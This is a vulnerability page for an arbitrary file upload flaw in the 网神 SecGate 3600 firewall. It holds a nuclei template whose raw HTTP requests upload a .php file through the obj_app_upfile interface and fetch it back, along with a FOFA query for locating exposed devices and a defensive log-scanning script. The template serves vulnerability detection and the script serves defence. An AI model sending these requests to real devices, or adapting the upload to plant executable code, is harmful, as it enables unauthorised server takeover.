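网神 SecGate 3600 Firewall Arbitrary File Upload Vulnerability
Description
The obj_app_upfile interface of the 网神 SecGate 3600 firewall has an arbitrary file upload vulnerability. An unauthorized attacker can exploit it to upload arbitrary files and gain server privileges.
nuclei template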
id: Netnifty-SecGate-3600-Firewal-fileuploads

info:
  # name (English): 网神 SecGate 3600 firewall arbitrary file upload
  name: 网神SecGate 3600防火墙任意文件上传
  severity: high
  # description (English): the obj_app_upfile interface allows arbitrary file upload;
  # an unauthorized attacker can upload arbitrary files and gain server privileges.
  description: |
    网神 SecGate 3600 防火墙 obj_app_upfile 接口存在任意文件上传漏洞,未经授权的攻击者通过漏洞可以上传任意文件,获取服务器权限。
  # remediation (English): remove the Internet exposure and enforce strong
  # authentication on the file upload module.
  remediation:
    关闭互联网暴露面,文件上传模块设置权限强认证。
  metadata:
    verified: true
    fofa-query: title="网神SecGate 3600防火墙"
  tags: fileupload,SecGate,3600,firewallindex

# r1 is the random file name, r2 the random marker written into the file
variables:
  r1: "{{rand_int(800000000, 1000000000)}}"
  r2: "{{rand_int(800000000, 1000000000)}}"

requests:
  - raw:
      # Request 1: upload a file that contains only the marker r2
      - |
        POST /?g=obj_app_upfile HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)
        Connection: close
        Content-Length: 428
        Accept: */*
        Accept-Encoding: gzip, deflate, br
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQc
        Cookie: __s_sessionid__=1;

        ------WebKitFormBoundaryJpMyThWnAxbcBBQc
        Content-Disposition: form-data; name="certfile";filename="{{r1}}.php"
        Content-Type: text/plain

        {{r2}}
        ------WebKitFormBoundaryJpMyThWnAxbcBBQc
        Content-Disposition: form-data; name="submit_post"

        sec_web_auth_custom_setting_confsave
        ------WebKitFormBoundaryJpMyThWnAxbcBBQc
        Content-Disposition: form-data; name="certfile_r"

        file
        ------WebKitFormBoundaryJpMyThWnAxbcBBQc--
      # Request 2: fetch the uploaded file back
      - |
        GET /attachements/{{r1}}.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0

    # The target is reported only if the marker is served back with HTTP 200
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "{{r2}}"
      - type: status
        status:
          - 200
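
A defender-side check for the two requests the template sends, as an added example that is not part of the original page: it scans web access logs for a POST to `/?g=obj_app_upfile` and for script files fetched from `/attachements/`. The combined log format, the sample lines, the function name and the extra extensions beyond `.php` are assumptions; the page does not describe the appliance's log format.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed combined log format: ip - - [time] "METHOD target HTTP/x" status size
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')
# Script files directly under the upload directory named in the template
SCRIPT_RE = re.compile(r'^/attachements/[^/]+\.(php\d?|phtml|phar)$', re.I)

def find_upload_abuse(lines):
    """Return (line_no, client_ip, kind, target) tuples for suspicious requests."""
    findings, uploaders = [], set()
    for n, line in enumerate(lines, 1):
        m = LINE_RE.match(line)
        if not m:
            continue  # not an access-log line in the assumed format
        url = urlsplit(m["target"])
        if m["method"] == "POST" and "obj_app_upfile" in parse_qs(url.query).get("g", []):
            # Any POST to the upload interface is worth reviewing
            uploaders.add(m["ip"])
            findings.append((n, m["ip"], "upload-post", m["target"]))
        elif m["method"] == "GET" and SCRIPT_RE.match(url.path):
            # A 200 for a script fetched by a client that uploaded earlier is the
            # strongest signal; other script requests are reported as probes.
            served = m["status"] == "200" and m["ip"] in uploaders
            kind = "script-fetch-after-upload" if served else "script-fetch"
            findings.append((n, m["ip"], kind, m["target"]))
    return findings

# Constructed sample log lines (documentation IP ranges, not real traffic)
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET / HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "POST /?g=obj_app_upfile HTTP/1.1" 200 64',
    '198.51.100.7 - - [01/Jan/2024:10:00:06 +0000] "GET /attachements/912345678.php HTTP/1.1" 200 9',
    '192.0.2.10 - - [01/Jan/2024:10:01:00 +0000] "GET /attachements/logo.png HTTP/1.1" 200 2048',
    '203.0.113.5 - - [01/Jan/2024:10:02:00 +0000] "GET /attachements/x.php HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for finding in find_upload_abuse(SAMPLE_LOG):
        print(finding)
```

Any `script-fetch-after-upload` hit should be followed by a review of the files present in the `/attachements/` directory on the device.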